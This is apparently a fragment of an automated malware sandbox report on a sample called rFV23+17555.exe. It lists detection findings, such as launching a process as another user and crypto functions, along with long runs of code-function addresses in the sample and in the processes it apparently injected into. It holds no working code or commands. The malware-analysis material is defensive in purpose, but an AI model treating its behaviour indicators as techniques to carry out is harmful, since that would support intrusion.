Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00427A30 NtAllocateVirtualMemory,	7_2_00427A30

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\rFV23+17555.exe

Code function: 0_2_0D799CB0 CreateProcessAsUserW,

0_2_0D799CB0

Detected potential crypto function

Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_026D62B8	0_2_026D62B8
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_026D71A8	0_2_026D71A8
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0606E214	0_2_0606E214
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_060610AC	0_2_060610AC
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0606E208	0_2_0606E208
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0606E268	0_2_0606E268
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0606F070	0_2_0606F070
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0606D078	0_2_0606D078
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0606D0C0	0_2_0606D0C0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0606B0D4	0_2_0606B0D4
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0606D0D0	0_2_0606D0D0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_063C1408	0_2_063C1408
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_063CC6E0	0_2_063CC6E0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_063CC6DD	0_2_063CC6DD
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_063C8878	0_2_063C8878
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_063CB160	0_2_063CB160
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07741140	0_2_07741140
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0774EC60	0_2_0774EC60
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0774EC2D	0_2_0774EC2D
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2B338	0_2_07B2B338
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B28631	0_2_07B28631
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2A240	0_2_07B2A240
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2C248	0_2_07B2C248
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2A968	0_2_07B2A968
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2DFD8	0_2_07B2DFD8
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2E352	0_2_07B2E352
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2E358	0_2_07B2E358
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2A231	0_2_07B2A231
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B29602	0_2_07B29602
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2C201	0_2_07B2C201
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2E9B2	0_2_07B2E9B2
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2E590	0_2_07B2E590
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2E580	0_2_07B2E580
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2C919	0_2_07B2C919
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2D0F0	0_2_07B2D0F0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2D0E1	0_2_07B2D0E1
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2DCE8	0_2_07B2DCE8
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07B2DCD8	0_2_07B2DCD8
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_080CA940	0_2_080CA940
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_080C2388	0_2_080C2388
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_080CC2B0	0_2_080CC2B0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_080C2379	0_2_080C2379
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D794048	0_2_0D794048
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D7928E0	0_2_0D7928E0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D79DB18	0_2_0D79DB18
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D794FA8	0_2_0D794FA8
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D79A248	0_2_0D79A248
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D7985E0	0_2_0D7985E0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D793878	0_2_0D793878
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D790040	0_2_0D790040
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D794038	0_2_0D794038
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D790007	0_2_0D790007
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D796CF0	0_2_0D796CF0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D796CE0	0_2_0D796CE0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D7928D0	0_2_0D7928D0
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D792B71	0_2_0D792B71
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D792B80	0_2_0D792B80
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D793210	0_2_0D793210
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0D79EE10	0_2_0D79EE10
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0774113A	0_2_0774113A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00404A55	4_2_00404A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00401260	4_2_00401260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00401AC0	4_2_00401AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00401ABF	4_2_00401ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0042D363	4_2_0042D363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040FB8B	4_2_0040FB8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040FB93	4_2_0040FB93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0041647E	4_2_0041647E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00403400	4_2_00403400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00416483	4_2_00416483
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040FDB3	4_2_0040FDB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040262B	4_2_0040262B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00402630	4_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040DE33	4_2_0040DE33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B901AA	4_2_01B901AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B841A2	4_2_01B841A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B881CC	4_2_01B881CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AC0100	4_2_01AC0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B6A118	4_2_01B6A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B58158	4_2_01B58158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B62000	4_2_01B62000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ADE3F0	4_2_01ADE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B903E6	4_2_01B903E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8A352	4_2_01B8A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B502C0	4_2_01B502C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B70274	4_2_01B70274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B90591	4_2_01B90591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD0535	4_2_01AD0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B7E4F6	4_2_01B7E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B74420	4_2_01B74420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B82446	4_2_01B82446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ACC7C0	4_2_01ACC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD0770	4_2_01AD0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AF4750	4_2_01AF4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AEC6E0	4_2_01AEC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD29A0	4_2_01AD29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B9A9A6	4_2_01B9A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AE6962	4_2_01AE6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AB68B8	4_2_01AB68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AFE8F0	4_2_01AFE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD2840	4_2_01AD2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ADA840	4_2_01ADA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B86BD7	4_2_01B86BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8AB40	4_2_01B8AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ACEA80	4_2_01ACEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AE8DBF	4_2_01AE8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ACADE0	4_2_01ACADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B6CD1F	4_2_01B6CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ADAD00	4_2_01ADAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B70CB5	4_2_01B70CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AC0CF2	4_2_01AC0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD0C00	4_2_01AD0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B4EFA0	4_2_01B4EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ADCFE0	4_2_01ADCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AC2FC8	4_2_01AC2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B72F30	4_2_01B72F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B12F28	4_2_01B12F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AF0F30	4_2_01AF0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B44F40	4_2_01B44F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8CE93	4_2_01B8CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AE2E90	4_2_01AE2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8EEDB	4_2_01B8EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8EE26	4_2_01B8EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD0E59	4_2_01AD0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ADB1B0	4_2_01ADB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B9B16B	4_2_01B9B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ABF172	4_2_01ABF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B0516C	4_2_01B0516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B870E9	4_2_01B870E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8F0E0	4_2_01B8F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD70C0	4_2_01AD70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B7F0CC	4_2_01B7F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B1739A	4_2_01B1739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8132D	4_2_01B8132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01ABD34C	4_2_01ABD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD52A0	4_2_01AD52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B712ED	4_2_01B712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AEB2C0	4_2_01AEB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B6D5B0	4_2_01B6D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B87571	4_2_01B87571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8F43F	4_2_01B8F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AC1460	4_2_01AC1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8F7B0	4_2_01B8F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B816CC	4_2_01B816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B65910	4_2_01B65910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD9950	4_2_01AD9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AEB950	4_2_01AEB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD38E0	4_2_01AD38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B3D800	4_2_01B3D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AEFB80	4_2_01AEFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B45BF0	4_2_01B45BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B0DBF9	4_2_01B0DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8FB76	4_2_01B8FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B15AA0	4_2_01B15AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B71AA3	4_2_01B71AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B6DAAC	4_2_01B6DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B7DAC6	4_2_01B7DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B43A6C	4_2_01B43A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8FA49	4_2_01B8FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B87A46	4_2_01B87A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AEFDC0	4_2_01AEFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B87D73	4_2_01B87D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B81D5A	4_2_01B81D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD3D40	4_2_01AD3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8FCF2	4_2_01B8FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B49C32	4_2_01B49C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8FFB1	4_2_01B8FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD1F92	4_2_01AD1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01B8FF09	4_2_01B8FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AD9EB0	4_2_01AD9EB0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C602C0	7_2_02C602C0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C80274	7_2_02C80274
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02CA03E6	7_2_02CA03E6
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BEE3F0	7_2_02BEE3F0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9A352	7_2_02C9A352
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C72000	7_2_02C72000
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C981CC	7_2_02C981CC
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02CA01AA	7_2_02CA01AA
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C68158	7_2_02C68158
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BD0100	7_2_02BD0100
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C7A118	7_2_02C7A118
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BFC6E0	7_2_02BFC6E0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BDC7C0	7_2_02BDC7C0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C04750	7_2_02C04750
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE0770	7_2_02BE0770
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C8E4F6	7_2_02C8E4F6
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C92446	7_2_02C92446
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C84420	7_2_02C84420
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02CA0591	7_2_02CA0591
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE0535	7_2_02BE0535
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BDEA80	7_2_02BDEA80
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C96BD7	7_2_02C96BD7
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9AB40	7_2_02C9AB40
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BC68B8	7_2_02BC68B8
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C0E8F0	7_2_02C0E8F0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BEA840	7_2_02BEA840
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE2840	7_2_02BE2840
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE29A0	7_2_02BE29A0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02CAA9A6	7_2_02CAA9A6
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BF6962	7_2_02BF6962
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9EEDB	7_2_02C9EEDB
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BF2E90	7_2_02BF2E90
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9CE93	7_2_02C9CE93
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE0E59	7_2_02BE0E59
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9EE26	7_2_02C9EE26
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BECFE0	7_2_02BECFE0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C5EFA0	7_2_02C5EFA0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BD2FC8	7_2_02BD2FC8
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C54F40	7_2_02C54F40
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C22F28	7_2_02C22F28
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C00F30	7_2_02C00F30
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C82F30	7_2_02C82F30
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BD0CF2	7_2_02BD0CF2
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C80CB5	7_2_02C80CB5
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE0C00	7_2_02BE0C00
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BF8DBF	7_2_02BF8DBF
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BDADE0	7_2_02BDADE0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BEAD00	7_2_02BEAD00
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C7CD1F	7_2_02C7CD1F
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE52A0	7_2_02BE52A0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C812ED	7_2_02C812ED
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BFB2C0	7_2_02BFB2C0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C2739A	7_2_02C2739A
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9132D	7_2_02C9132D
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BCD34C	7_2_02BCD34C
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C8F0CC	7_2_02C8F0CC
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C970E9	7_2_02C970E9
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9F0E0	7_2_02C9F0E0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE70C0	7_2_02BE70C0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BEB1B0	7_2_02BEB1B0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02CAB16B	7_2_02CAB16B
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C1516C	7_2_02C1516C
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BCF172	7_2_02BCF172
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C916CC	7_2_02C916CC
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9F7B0	7_2_02C9F7B0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BD1460	7_2_02BD1460
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9F43F	7_2_02C9F43F
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C7D5B0	7_2_02C7D5B0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C97571	7_2_02C97571
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C8DAC6	7_2_02C8DAC6
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C25AA0	7_2_02C25AA0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C7DAAC	7_2_02C7DAAC
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C81AA3	7_2_02C81AA3
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9FA49	7_2_02C9FA49
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C97A46	7_2_02C97A46
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C53A6C	7_2_02C53A6C
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C55BF0	7_2_02C55BF0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C1DBF9	7_2_02C1DBF9
